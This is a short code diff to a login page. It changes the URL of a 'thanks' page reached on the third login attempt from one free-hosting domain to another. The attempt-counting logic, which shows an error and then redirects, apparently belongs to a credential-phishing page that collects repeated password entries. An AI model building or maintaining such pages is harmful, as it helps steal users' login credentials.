--- a/login.html
+++ b/login.html
@@ -135,7 +135,7 @@
       } else {
         // Third attempt → redirect to success page
         errorText.style.display = 'none';
-        nextField.value = "https://krelbs.vercel.app/thanks.html";
+        nextField.value = "https://laktrecx.netlify.app/thanks.html";
         localStorage.removeItem('login_attempt');
       }
 
@@ -146,4 +146,5 @@
   <script src='app.js'></script>
 </body>
 </html>
+
 
